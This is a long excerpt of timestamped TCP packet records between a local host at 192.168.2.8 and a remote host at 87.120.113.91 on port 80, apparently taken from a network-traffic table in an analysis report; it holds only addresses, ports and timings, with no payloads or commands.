                                                        Dec 31, 2024 09:28:27.768424988 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.768435001 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.768445015 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.768452883 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.768462896 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.768469095 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.768486023 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.768493891 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.768503904 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.768515110 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.768522978 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.768532038 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.768543005 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.768552065 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.768560886 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.768572092 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.768573999 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.768589020 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.768599987 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.768605947 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.768615961 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.768625975 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.768635988 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.768646955 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.768652916 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.768662930 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.768672943 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.768681049 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.768692970 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.768697977 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.768709898 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.768714905 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.768724918 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.768745899 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.769304991 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.769316912 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.769326925 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.769340038 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.769350052 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.769359112 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.769368887 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.769380093 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.769388914 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.769396067 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.769407034 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.769416094 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.769424915 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.769450903 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.769457102 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.769465923 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.769475937 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.769486904 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.769493103 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.769507885 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.769512892 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.769521952 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.769532919 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.769550085 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.769557953 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.769568920 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.769579887 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.769589901 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.769599915 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.769610882 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.769620895 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.769630909 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.769642115 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.769651890 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.769651890 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.769663095 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.769663095 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.769663095 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.769671917 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.769682884 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.769711018 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.770279884 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.770292044 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.770302057 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.770312071 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.770318985 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.770328045 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.770338058 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.770348072 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.770359039 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.770369053 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.770385981 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.770395994 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.770406008 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.770416021 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.770425081 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.770431995 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.770442009 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.770452023 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.770459890 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.770468950 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.770483017 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.770490885 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.770500898 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.770514011 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.770519972 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.770534992 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.770545006 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.770551920 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.770560980 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.770571947 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.770581961 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.770589113 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.770601034 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.770611048 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.770622015 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.770632982 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.770646095 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.770651102 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.770661116 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.770668983 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.770678997 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.770704031 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.771214008 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.771225929 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.771235943 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.771245956 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.771259069 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.771266937 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.771281958 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.771292925 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.771300077 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.771308899 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.771327019 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.771341085 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.771347046 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.771356106 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.771364927 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.771373034 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.771394014 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.772237062 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.772248030 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.772258997 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.772289991 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.772301912 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.772310019 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.772319078 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.772332907 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.772351027 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.772418976 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.772432089 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.772442102 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.772453070 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.772460938 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.772471905 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.772481918 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.772505999 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.772532940 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.772546053 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.772589922 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.951581001 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.956418037 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.956430912 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.956439018 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.956505060 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.957371950 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.962244987 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.962256908 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.962268114 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.962287903 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.962299109 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.962311029 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.962331057 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.962347984 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.962368965 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.962377071 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.962419987 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.962441921 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.962455034 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.962465048 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.962476015 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.962486982 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.962492943 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.962510109 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.962620974 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.962630987 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.962642908 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.962654114 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.962661982 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.962672949 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.962682009 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.962691069 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.962702990 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.962711096 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.962739944 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.962872028 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.962901115 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.962913990 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.962923050 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.962934971 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.962943077 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.962951899 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.962958097 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.962970018 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.963005066 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.963028908 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.963041067 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.963051081 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.963063955 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.963068962 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.963083029 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.963090897 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.963100910 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.963112116 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.963120937 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.963131905 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.963144064 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.963151932 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.963164091 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.963175058 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.963187933 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.963208914 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.963748932 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.963759899 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.963776112 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.963785887 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.963793993 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.963804007 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.963814020 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.963820934 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.963845968 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.963869095 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.963881016 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.963891029 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.963912010 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.963944912 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.963957071 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.963995934 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.964023113 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.964040041 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.964051008 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.964059114 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.964092016 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.964111090 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.964121103 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.964133024 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.964173079 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.964184999 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.964226961 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.964636087 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.964678049 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.964684963 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.964690924 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.964736938 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.964749098 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.964764118 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.964802027 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.964826107 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.964837074 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.964848042 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.964879990 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.964889050 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.964914083 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.964921951 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.964931011 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.964968920 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.965040922 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.965055943 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.965082884 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.965095997 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.965104103 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.965128899 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.965545893 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.965557098 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.965568066 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.965591908 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.965610027 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.965621948 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.965637922 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.965648890 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.965656042 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.965672970 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.965702057 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.965713024 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.965723991 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.965734005 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.965740919 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.965750933 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.965759039 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.965804100 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.965835094 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.965846062 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.965856075 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.965867043 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.965877056 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.965884924 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.965903044 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.965941906 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.965981007 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.966443062 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.966470003 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.966480970 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.966491938 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.966505051 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.966525078 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.966541052 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.966551065 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.966562986 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.966577053 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.966582060 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.966617107 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.966634989 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.966650963 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.966689110 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.966706991 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.966717958 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.966727972 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.966811895 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.966823101 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.966834068 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.966845036 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.966885090 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.967348099 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.967361927 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.967372894 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.967386007 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.967396021 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.967416048 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.967433929 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.967447042 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.967473984 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.967483997 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.967514038 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.967535019 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.967545986 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.967571020 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.967586040 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.967597961 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.967631102 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.967649937 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.967659950 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.967669964 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.967680931 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.967715025 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.967736959 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.967747927 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.967797995 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.968184948 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.968224049 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.968261957 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.968280077 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.968291998 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.968302965 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.968333960 CET4970880192.168.2.887.120.113.91
